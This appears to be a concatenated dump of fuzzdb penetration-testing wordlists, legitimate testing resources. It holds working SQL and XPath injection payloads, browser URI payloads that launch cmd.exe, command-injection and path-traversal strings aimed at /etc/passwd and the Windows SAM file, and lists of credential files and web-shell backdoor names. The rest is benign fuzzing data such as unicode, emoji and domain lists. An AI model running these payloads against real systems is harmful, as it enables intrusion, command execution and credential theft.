/fuzzdb/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 
0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /fuzzdb/attack/string-expansion/shell-expansion.txt: -------------------------------------------------------------------------------- 1 | $HOME 2 | $ENV{'HOME'} 3 | %d 4 | %s 5 | {0} 6 | %*.*s 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/README.md: -------------------------------------------------------------------------------- 1 | Many of the files in this directory originated from the project 2 | https://github.com/minimaxir/big-list-of-naughty-strings 3 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/corrupted.txt: -------------------------------------------------------------------------------- 1 | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ 2 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ 3 | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ 4 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ 5 | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/emoji.txt: -------------------------------------------------------------------------------- 
1 | 2 | 😍 3 | 👩🏽 4 | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 5 | 🐵 🙈 🙉 🙊 6 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 7 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 8 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 9 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 10 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/japanese-emoticon.txt: -------------------------------------------------------------------------------- 1 | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ 2 | (。◕ ∀ ◕。) 3 | `ィ(´∀`∩ 4 | __ロ(,_,*) 5 | ・( ̄∀ ̄)・:*: 6 | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚ 7 | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ 8 | (╯°□°)╯︵ ┻━┻) 9 | (ノಥ益ಥ)ノ ┻━┻ 10 | ┬─┬ノ( º _ ºノ) 11 | ( ͡° ͜ʖ ͡°) 12 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/naughty-unicode.txt: -------------------------------------------------------------------------------- 1 | Ω≈ç√∫˜µ≤≥÷ 2 | åß∂ƒ©˙∆˚¬…æ 3 | œ∑´®†¥¨ˆøπ“‘ 4 | ¡™£¢∞§¶•ªº–≠ 5 | ¸˛Ç◊ı˜Â¯˘¿ 6 | ÅÍÎÏ˝ÓÔÒÚÆ☃ 7 | Œ„´‰ˇÁ¨ˆØ∏”’ 8 | `⁄€‹›fifl‡°·‚—± 9 | ⅛⅜⅝⅞ 10 | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя 11 | ٠١٢٣٤٥٦٧٨٩ 12 | 13 | 14 | 15 | 16 | 17 | ⁰⁴⁵ 18 | ₀₁₂ 19 | ⁰⁴⁵₀₁₂ 20 | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ 21 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/regionalindicators.txt: -------------------------------------------------------------------------------- 1 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 2 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 3 | 🇺🇸🇷🇺🇸🇦 4 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/right-to-left.txt: -------------------------------------------------------------------------------- 1 | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. 
سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. 2 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ 3 | הָיְתָהtestالصفحات التّحول 4 | ﷽ 5 | ﷺ 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/specialchars.txt: -------------------------------------------------------------------------------- 1 | , 2 | . 3 | / 4 | ; 5 | ' 6 | [ 7 | ] 8 | \ 9 | - 10 | = 11 | < 12 | > 13 | ? 14 | : 15 | " 16 | { 17 | } 18 | | 19 | _ 20 | + 21 | ! 22 | @ 23 | # 24 | $ 25 | % 26 | ^ 27 | & 28 | * 29 | ( 30 | ) 31 | ` 32 | ~ 33 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/two-byte-chars.txt: -------------------------------------------------------------------------------- 1 | 田中さんにあげて下さい 2 | パーティーへ行かないか 3 | 和製漢語 4 | 部落格 5 | 사회과학원 어학연구소 6 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 7 | 社會科學院語學研究所 8 | 울란바토르 9 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 10 | -------------------------------------------------------------------------------- /fuzzdb/attack/unicode/upsidedown.txt: -------------------------------------------------------------------------------- 1 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ 2 | 00˙Ɩ$- 3 | -------------------------------------------------------------------------------- /fuzzdb/attack/xpath/README.md: -------------------------------------------------------------------------------- 1 | tool: 2 | http://code.google.com/p/xpath-blind-explorer/ 3 | 4 | video: 5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/ 6 | 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/xpath/xpath-injection.txt: -------------------------------------------------------------------------------- 1 | ' or '1'='1 2 | ' or ''=' 3 | x' or 1=1 or 'x'='y 4 | / 5 | // 6 | //* 7 | */* 8 | @* 9 | 
count(/child::node()) 10 | x' or name()='username' or 'x'='y 11 | ' and count(/*)=1 and '1'='1 12 | ' and count(/@*)=1 and '1'='1 13 | ' and count(/comment())=1 and '1'='1 -------------------------------------------------------------------------------- /fuzzdb/attack/xss/README.md: -------------------------------------------------------------------------------- 1 | test.xxe - requested by some payloads from fuzzdb github repo raw filepath
2 | xss-rsnake.fuzz.txt - rsnake's classic fuzzfile, modified to load http://xss.rocks test files
3 | xss-other.fuzz.txt - newer payloads from various sources: my own testing, interesting filter bypasses found in the wild, etc.
4 | xss-uri.fuzz.txt - URI abuse test cases
5 | XSSPolyglot.fuzz.txt - from https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot - check the page for filter evasions and other interesting stuff 6 |
7 | 8 | 9 | HTML5 Cheatsheet 10 | * https://html5sec.org/ 11 | * https://github.com/cure53/H5SC 12 | 13 |
14 | 15 | WASC Script Mapping Project 16 | * http://projects.webappsec.org/w/page/13246958/Script%20Mapping 17 | 18 | 19 | -------------------------------------------------------------------------------- /fuzzdb/attack/xss/all-encodings-of-lt.txt: -------------------------------------------------------------------------------- 1 | < 2 | %3C 3 | < 4 | < 5 | < 6 | < 7 | < 8 | < 9 | < 10 | < 11 | < 12 | < 13 | < 14 | < 15 | < 16 | < 17 | < 18 | < 19 | < 20 | < 21 | < 22 | < 23 | < 24 | < 25 | < 26 | < 27 | < 28 | < 29 | < 30 | < 31 | < 32 | < 33 | < 34 | < 35 | < 36 | < 37 | < 38 | < 39 | < 40 | < 41 | < 42 | < 43 | < 44 | < 45 | < 46 | < 47 | < 48 | < 49 | < 50 | < 51 | < 52 | < 53 | < 54 | < 55 | < 56 | < 57 | < 58 | < 59 | < 60 | < 61 | < 62 | < 63 | < 64 | < 65 | < 66 | < 67 | \x3c 68 | \x3C 69 | \u003c 70 | \u003C 71 | -------------------------------------------------------------------------------- /fuzzdb/attack/xss/default-javascript-event-attributes.txt: -------------------------------------------------------------------------------- 1 | onAbort 2 | onBlur 3 | onChange 4 | onClick 5 | onDblClick 6 | onDragDrop 7 | onError 8 | onFocus 9 | onKeyDown 10 | onKeyPress 11 | onKeyUp 12 | onLoad 13 | onMouseDown 14 | onMouseMove 15 | onMouseOut 16 | onMouseOver 17 | onMouseUp 18 | onMove 19 | onReset 20 | onResize 21 | onSelect 22 | onSubmit 23 | -------------------------------------------------------------------------------- /fuzzdb/attack/xss/test.xxe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/xss/xss-uri.txt: -------------------------------------------------------------------------------- 1 | aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" 2 | firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" 3 | navigatorurl:test" 
-chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 4 | res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 5 | firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 6 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 7 | -------------------------------------------------------------------------------- /fuzzdb/discovery/UserAgent/UserAgentListCommon.txt: -------------------------------------------------------------------------------- 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 2 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) 3 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; 
.NET CLR 3.0.04506.30) 4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) 5 | Opera/9.20 (Windows NT 6.0; U; en) 6 | Opera/9.00 (Windows NT 5.1; U; en) 7 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50 8 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1 9 | Googlebot/2.1 ( http://www.googlebot.com/bot.html) 10 | Googlebot-Image/1.0 ( http://www.googlebot.com/bot.html) 11 | Mozilla/2.0 (compatible; Ask Jeeves) 12 | msnbot-Products/1.0 (+http://search.msn.com/msnbot.htm) 13 | Mozilla/5.0 (iPad; U; CPU OS 3_2_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B500 Safari/531.21.10 14 | Mozilla/5.0 (iPad; CPU OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25 15 | Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko 16 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko 17 | Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 18 | Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 19 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 20 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) 21 | Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 -------------------------------------------------------------------------------- /fuzzdb/discovery/dns/CcTLD.txt: -------------------------------------------------------------------------------- 1 | ac 2 | ad 3 | ae 4 | af 5 | ag 6 | ai 7 | al 8 | am 9 | an 10 | ao 11 | aq 12 | ar 13 | as 14 | at 15 | au 16 | aw 17 | ax 18 | az 19 | ba 20 | bb 21 | bd 22 | be 23 | bf 24 | bg 25 | bh 26 | bi 27 | bj 28 | bl 29 | bm 30 | bn 31 | bo 32 | bq 33 | br 34 | bs 35 | bt 36 | bv 37 | bw 38 | 
by 39 | bz 40 | ca 41 | cc 42 | cd 43 | cf 44 | cg 45 | ch 46 | ci 47 | ck 48 | cl 49 | cm 50 | cn 51 | co 52 | cr 53 | cu 54 | cv 55 | cw 56 | cx 57 | cy 58 | cz 59 | dd 60 | de 61 | dj 62 | dk 63 | dm 64 | do 65 | dz 66 | ec 67 | ee 68 | eg 69 | eh 70 | er 71 | es 72 | et 73 | eu 74 | fi 75 | fj 76 | fk 77 | fm 78 | fo 79 | fr 80 | ga 81 | gb 82 | gd 83 | ge 84 | gf 85 | gg 86 | gh 87 | gi 88 | gl 89 | gm 90 | gn 91 | gp 92 | gq 93 | gr 94 | gs 95 | gt 96 | gu 97 | gw 98 | gy 99 | hk 100 | hm 101 | hn 102 | hr 103 | ht 104 | hu 105 | id 106 | ie 107 | il 108 | im 109 | in 110 | io 111 | iq 112 | ir 113 | is 114 | it 115 | je 116 | jm 117 | jo 118 | jp 119 | ke 120 | kg 121 | kh 122 | ki 123 | km 124 | kn 125 | kp 126 | kr 127 | kw 128 | ky 129 | kz 130 | la 131 | lb 132 | lc 133 | li 134 | lk 135 | lr 136 | ls 137 | lt 138 | lu 139 | lv 140 | ly 141 | ma 142 | mc 143 | md 144 | me 145 | mf 146 | mg 147 | mh 148 | mk 149 | ml 150 | mm 151 | mn 152 | mo 153 | mp 154 | mq 155 | mr 156 | ms 157 | mt 158 | mu 159 | mv 160 | mw 161 | mx 162 | my 163 | mz 164 | na 165 | nc 166 | ne 167 | nf 168 | ng 169 | ni 170 | nl 171 | no 172 | np 173 | nr 174 | nu 175 | nz 176 | om 177 | pa 178 | pe 179 | pf 180 | pg 181 | ph 182 | pk 183 | pl 184 | pm 185 | pn 186 | pr 187 | ps 188 | pt 189 | pw 190 | py 191 | qa 192 | re 193 | ro 194 | rs 195 | ru 196 | rw 197 | sa 198 | sb 199 | sc 200 | sd 201 | se 202 | sg 203 | sh 204 | si 205 | sj 206 | sk 207 | sl 208 | sm 209 | sn 210 | so 211 | sr 212 | ss 213 | st 214 | su 215 | sv 216 | sx 217 | sy 218 | sz 219 | tc 220 | td 221 | tf 222 | tg 223 | th 224 | tj 225 | tk 226 | tl 227 | tm 228 | tn 229 | to 230 | tp 231 | tr 232 | tt 233 | tv 234 | tw 235 | tz 236 | ua 237 | ug 238 | uk 239 | um 240 | us 241 | uy 242 | uz 243 | va 244 | vc 245 | ve 246 | vg 247 | vi 248 | vn 249 | vu 250 | wf 251 | ws 252 | ye 253 | yt 254 | yu 255 | za 256 | zm 257 | zw 258 | -------------------------------------------------------------------------------- 
/fuzzdb/discovery/predictable-filepaths/Randomfiles.txt: -------------------------------------------------------------------------------- 1 | /accounts.txt 2 | /culeadora.txt 3 | /data.txt 4 | /database.txt 5 | /grabbed.html 6 | /info.txt 7 | /l0gs.txt 8 | /log.txt 9 | /logins.txt 10 | /logs.txt 11 | /members.txt 12 | /pass.txt 13 | /passes.txt 14 | /password.html 15 | /password.txt 16 | /passwords.html 17 | /passwords.txt 18 | /pazz.txt 19 | /pazzezs.txt 20 | /pw.txt 21 | /pws.txt 22 | /technico.txt 23 | /usernames.txt 24 | /users.txt 25 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/UnixDotfiles.txt: -------------------------------------------------------------------------------- 1 | /.DS_Store 2 | /.FBCIndex 3 | /.access 4 | /.addressbook 5 | /.bash_history 6 | /.bashrc 7 | /.cobalt 8 | /.cobalt/alert/service.cgi?service= 9 | /.cobalt/alert/service.cgi?service= 10 | /.cobalt/sysManage/../admin/.htaccess 11 | /.fhp 12 | /.forward 13 | /.history 14 | /.htaccess 15 | /.htaccess.old 16 | /.htaccess.save 17 | /.htaccess~ 18 | /.htpasswd 19 | /.lynx_cookies 20 | /.mysql_history 21 | /.nsconfig 22 | /.nsf/../winnt/win.ini 23 | /.passwd 24 | /.perf 25 | /.pinerc 26 | /.plan 27 | /.proclog 28 | /.procmailrc 29 | /.profile 30 | /.psql_history 31 | /.rhosts 32 | /.sh_history 33 | /.ssh 34 | /.ssh/authorized_keys 35 | /.ssh/known_hosts 36 | /.www_acl 37 | /.wwwacl 38 | /.access 39 | /.cobalt 40 | /.cobalt/alert/service.cgi?service= 41 | /.cobalt/alert/service.cgi?service= 42 | /.fhp 43 | /.htaccess 44 | /.htaccess.old 45 | /.htaccess.save 46 | /.htaccess~ 47 | /.htpasswd 48 | /.nsconfig 49 | /.passwd 50 | /.www_acl 51 | /.wwwacl 52 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt: -------------------------------------------------------------------------------- 1 | 3fexe.asp 2 | ASpy.asp 3 | 
EFSO.asp 4 | RemExp.asp 5 | aspxSH.asp 6 | aspxshell.aspx 7 | aspydrv.asp 8 | cmd.asp 9 | cmd.aspx 10 | cmdexec.aspx 11 | elmaliseker.asp 12 | filesystembrowser.aspx 13 | fileupload.aspx 14 | ntdaddy.asp 15 | spexec.aspx 16 | sql.aspx 17 | tool.asp 18 | tool.aspx 19 | toolaspshell.asp 20 | up.asp 21 | up.aspx 22 | zehir.asp 23 | zehir.aspx 24 | zehir4.asp 25 | zehir4.aspx 26 | cmd-asp-5.1.asp 27 | cmdasp.asp 28 | cmdasp.aspx 29 | list.asp 30 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cgi/CGI_HTTP_POST.txt: -------------------------------------------------------------------------------- 1 | post-query 2 | Config1.htm 3 | My_eGallery/public/displayCategory.php 4 | servlet/custMsg?guestName= 19 | /athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' 20 | /mkilog.exe 21 | /mkplog.exe 22 | /MsmMask.exe?mask=/junk334 23 | /MsmMask.exe?mask=/junk334 24 | /MsmMask.exe?mask=/junk334 25 | /MsmMask.exe?mask=/junk334 26 | /MsmMask.exe?mask=/junk334 27 | /perl.exe?-v 28 | /perl.exe 29 | /ppdscgi.exe 30 | /c32web.exe/ChangeAdminPassword 31 | /windmail.exe 32 | /dbmlparser.exe 33 | /cgimail.exe 34 | /minimal.exe 35 | /rguest.exe 36 | /visitor.exe 37 | /webbbs.exe 38 | /wguest.exe 39 | //_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 40 | /cfgwiz.exe 41 | /Cgitest.exe 42 | /mailform.exe 43 | /post16.exe 44 | /imagemap.exe 45 | /htimage.exe/path/filename?2,2 46 | /htimage.exe 47 | /Webnews.exe 48 | /texis.exe/junk 49 | /apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ 50 | /sensepost.exe?/c+dir 51 | /testcgi.exe 52 | /testcgi.exe? 
53 | /ion-p.exe?page=c:\winnt\repair\sam 54 | /../../../../../../../../../../WINNT/system32/ipconfig.exe 55 | /NUL/../../../../../../../../../WINNT/system32/ipconfig.exe 56 | /PRN/../../../../../../../../../WINNT/system32/ipconfig.exe 57 | /c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf 58 | /foxweb.dll 59 | /wconsole.dll 60 | /shtml.dll 61 | /scripts/slxweb.dll/getfile?type=Library&file=[invalid 62 | /filename] 63 | /rightfax/fuwww.dll/? 64 | /WINDMAIL.EXE?%20-n%20c:\boot.ini% 65 | /WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\ 66 | /GW5/GWWEB.EXE 67 | /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA 68 | /GW5/GWWEB.EXE?HELP=bad-request 69 | /GWWEB.EXE?HELP=bad-request 70 | /echo.bat 71 | /echo.bat?&dir+c:\\ 72 | /hello.bat?&dir+c:\\ 73 | /input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 74 | /input2.bat?|dir 75 | /input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 76 | /test-cgi.bat 77 | /test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 78 | /tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\, 79 | /_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X 80 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cms/README.md: -------------------------------------------------------------------------------- 1 | **CMS files generated with cms-explorer** http://code.google.com/p/cms-explorer/ 2 | use the provided lists for q&d but cms explorer does a lot more. 
3 | 4 | **wordpress.fuzz.txt** 5 | generated by bringing the filenames from each incremental new version of wordpress into one fuzzfile 6 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cms/joomla_themes.txt: -------------------------------------------------------------------------------- 1 | templates/abc/ 2 | templates/atomic/ 3 | templates/b59-tpl8/ 4 | templates/beez/ 5 | templates/carbon_07/ 6 | templates/crub/ 7 | templates/dm_arrow_red/ 8 | templates/gk_eshoptrix_2/ 9 | templates/gk_gomuproject/ 10 | templates/gk_icki_sports/ 11 | templates/gk_musictop/ 12 | templates/ja_purity/ 13 | templates/ja_rochea/ 14 | templates/ja_teline_ii/ 15 | templates/joomlaport_metro/ 16 | templates/js_relevant/ 17 | templates/mynxx_j15/ 18 | templates/planets/ 19 | templates/planetsv2/ 20 | templates/rhuk_milkyway/ 21 | templates/rt_hivemind_j15/ 22 | templates/rt_mediamogul_essentials_j15/ 23 | templates/rt_nexus_j15/ 24 | templates/siteground99/ 25 | templates/siteground-j15-14/ 26 | templates/siteground-j15-68/ 27 | templates/siteground-j15-86/ 28 | templates/system/ 29 | templates/yoo_phoenix/ 30 | templates/yoo_waybeyond/ 31 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/cms/wp_common_theme_files.txt: -------------------------------------------------------------------------------- 1 | 404.php 2 | archive.php 3 | archives.php 4 | author.php 5 | category.php 6 | comments.php 7 | content.php 8 | data.php 9 | footer.php 10 | functions.php 11 | header.php 12 | home.php 13 | image.php 14 | images 15 | images/content-bg.jpg 16 | images/footer.jpg 17 | images/footer.png 18 | images/functions.php 19 | images/gravatar.png 20 | images/header-bg.jpg 21 | images/header.png 22 | images/index.php 23 | images/main_bg.png 24 | images/rss.png 25 | images/Thumbs.db 26 | index.php 27 | js 28 | js/html5.js 29 | languages 30 | license.txt 31 | 
